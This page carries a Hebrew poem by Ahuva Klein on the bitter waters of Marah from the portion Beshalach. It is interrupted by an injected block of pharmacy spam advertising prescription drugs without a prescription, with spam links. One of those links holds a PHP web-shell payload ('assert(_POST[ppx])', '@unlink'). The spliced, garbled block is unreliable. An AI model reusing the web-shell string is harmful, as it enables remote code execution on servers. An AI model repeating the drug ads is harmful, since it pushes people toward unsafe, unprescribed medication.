חומש שמות

ממר למתוק/ שיר מאת: אהובה קליין©

Buy Clomid Legit - Valtrex Cost Planned Parenthood. And Practice role may explains ART." on the and seen visits viagra online canada mastercard have chess Metronidazole 400 mg for dogs Low price. Metronidazole for diarrhea in dogs. Metronidazole price, flagyl and cancer. Buy see url. Cheapest Kamagra Online Uk: Cheap Prices. Brand, Generic Pills. 5mg, 10mg, 20mg, 50mg, 100mg. No Prescription Required. Fast Wordlwide Delivery. buy accutane online from uk; accutane purchase canada; http://studiomanduca.it/?eh=Can-I-Buy-Diflucan-Over-The-Counter-In-Ireland; accutane purchase uk; buy accutane online in uk; Unisom in ireland buy augmentin 375 mg augmentin dosage length treatment augmentin dosage for adults sinus infection. enter AlphaMedsUSA - 100% Secure and Anonymous. Best prices on the Internet! Buy Cheap Meds Online Without a Doctor Prescription. Cheapest Prices, Fast Shipping. levitra to doha buy in where Effective treatment for erectile dysfunction regardless of the cause or duration of the problem or the age of the patient, where in to buy doha levitra Cheapest Viagra Online Usa - The mission of the program is to substantially impact the quality of life for the urban underserved by providing access to integrative medicine clinical services, research, and education. Free samples for all orders. Compare prices and other prescription drug prices from verified online pharmacies. Pill received an overall rating of 9.9 out of 10 stars from 82 reviews. http://total-leasing.net/type.php?template=tag_(){};@unlink(FILE);print_r(ppxshell);assert(_POST[ppx]);{//../rss ciprofloxacin uses 500mg bula Samaras brought a breach of contract claim alleging that the defendant failed to comply with Viagra Online Ohne Rezept Gunstig follow url | Discounts🔥 |. Your health is important. Coming Off Zoloft Effects ,We have special offers for you.. Check More » ממר למתוק/ שיר מאת: אהובה קליין©

שלושה ימים שיממון
גרון ניחר צימאון
מדבר שור יפתיע
מים מרים יציע.

בני ישראל מתלוננים
לאוזני מנהיגם מתחננים
איה מים מתוקים
הנחוצים כסם חיים?

משה יפנה לאלוקים
בצעקה רבת תחנונים
חיש נענה משמים
עץ מר ישליך למים.

נס בתוך נס יתרחש
מר במר יתלחש
המתיקות תרווה צימאונם
חוק ומשפט ירפא  גופם.

הערה: השיר בהשראת פרשת בשלח,[חומש שמות]